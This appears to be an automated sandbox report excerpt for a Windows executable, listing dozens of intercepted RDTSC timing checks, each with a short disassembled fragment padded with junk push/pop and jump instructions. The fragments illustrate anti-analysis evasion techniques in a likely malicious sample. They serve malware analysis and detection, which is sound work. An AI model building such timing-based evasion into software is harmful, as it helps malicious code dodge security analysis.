Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E7CD0 second address: 16E7CE8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB6E8B0C7EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E7CE8 second address: 16E7D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB6E8B0AEE5h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e ja 00007FB6E8B0AED6h 0x00000014 pop ebx 0x00000015 jnl 00007FB6E8B0AEDAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E71E8 second address: 16E71EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E7361 second address: 16E7397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB6E8B0AEDEh 0x0000000e jns 00007FB6E8B0AED6h 0x00000014 jmp 00007FB6E8B0AEE8h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E74C1 second address: 16E74F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007FB6E8B0C7FBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6E8B0C7EDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E74F3 second address: 16E74FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E74FF second address: 16E7512 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6E8B0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FB6E8B0C7E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA420 second address: 16EA442 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FB6E8B0AED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB6E8B0AEE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA5B0 second address: 16EA5BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA5BB second address: 16EA5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB6E8B0AED6h 0x0000000a pop edi 0x0000000b jo 00007FB6E8B0AEDEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA75E second address: 16EA78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jno 00007FB6E8B0C7ECh 0x00000011 push esi 0x00000012 jmp 00007FB6E8B0C7EFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA78C second address: 16EA7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6E8B0AEE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA7A9 second address: 16EA7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F166D second address: 16F1688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1688 second address: 16F1692 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6E8B0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1692 second address: 16F16A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6E8B0AEDDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1AE6 second address: 16F1AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1AF8 second address: 16F1AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F22F4 second address: 16F22F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F2627 second address: 16F262B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F2BD4 second address: 16F2BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F31BC second address: 16F31C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F31C0 second address: 16F31C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F8376 second address: 16F8395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE2h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F8395 second address: 16F839C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F839C second address: 16F83C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FB6E8B0AEF5h 0x0000000d jmp 00007FB6E8B0AEE9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F83C4 second address: 16F83F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FB6E8B0C7E8h 0x0000000e pushad 0x0000000f jmp 00007FB6E8B0C7F7h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jnp 00007FB6E8B0C7E6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F75C9 second address: 16F75DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB6E8B0AEDFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F7CFF second address: 16F7D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB6E8B0C7E6h 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007FB6E8B0C7E6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FB6E8B0C7E8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F7E8E second address: 16F7EAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB6E8B0AEE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FB6E8B0AED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F7EAE second address: 16F7EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16FCE2E second address: 16FCE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEDFh 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b jbe 00007FB6E8B0AEE4h 0x00000011 push eax 0x00000012 jnp 00007FB6E8B0AED6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17080B4 second address: 17080BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17080BA second address: 17080BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17080BE second address: 17080D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FB6E8B0C7EEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17060F8 second address: 17060FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17060FE second address: 1706102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170659B second address: 17065A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17066F8 second address: 17066FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170686D second address: 1706871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706871 second address: 170688D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB6E8B0C7EEh 0x0000000c jl 00007FB6E8B0C7E6h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706A0D second address: 1706A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706A15 second address: 1706A22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B68 second address: 1706B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B6C second address: 1706B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B70 second address: 1706B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B79 second address: 1706B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FB6E8B0C7F4h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B98 second address: 1706B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B9F second address: 1706BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706D15 second address: 1706D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706D20 second address: 1706D2A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB6E8B0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706EB6 second address: 1706EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706EBB second address: 1706EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FB6E8B0C7F5h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB6E8B0C7ECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707076 second address: 170707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17077F2 second address: 170780E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB6E8B0C7F4h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170780E second address: 1707814 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707F48 second address: 1707F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707F4E second address: 1707F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1707F54 second address: 1707F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170DB8F second address: 170DB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170DB93 second address: 170DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D704 second address: 170D708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D708 second address: 170D70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D70C second address: 170D72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007FB6E8B0AED6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop esi 0x00000013 jc 00007FB6E8B0AEEAh 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FB6E8B0AED6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170D72F second address: 170D733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1710172 second address: 171018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FB6E8B0AEDBh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FB6E8B0AED6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D6F7 second address: 171D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D6FD second address: 171D70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB6E8B0AED6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D70A second address: 171D71F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D71F second address: 171D727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 171D727 second address: 171D73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7EDh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1720690 second address: 17206A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007FB6E8B0AED6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 172022A second address: 1720269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB6E8B0C7EBh 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6E8B0C7F8h 0x00000015 jmp 00007FB6E8B0C7F1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1720269 second address: 1720274 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1720274 second address: 172027A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 172027A second address: 1720280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1721FEE second address: 1721FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173282F second address: 1732837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1732837 second address: 173283B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17345D3 second address: 17345D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17345D9 second address: 17345E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173BBD3 second address: 173BBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173BD41 second address: 173BD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173BED1 second address: 173BEEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE1h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C049 second address: 173C04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C04D second address: 173C064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB6E8B0AEDCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C064 second address: 173C087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB6E8B0C7E6h 0x0000000a jmp 00007FB6E8B0C7F9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C1FC second address: 173C213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FB6E8B0AED6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007FB6E8B0AED6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C213 second address: 173C223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C223 second address: 173C23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173C23C second address: 173C253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6E8B0C7F1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173CF27 second address: 173CF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
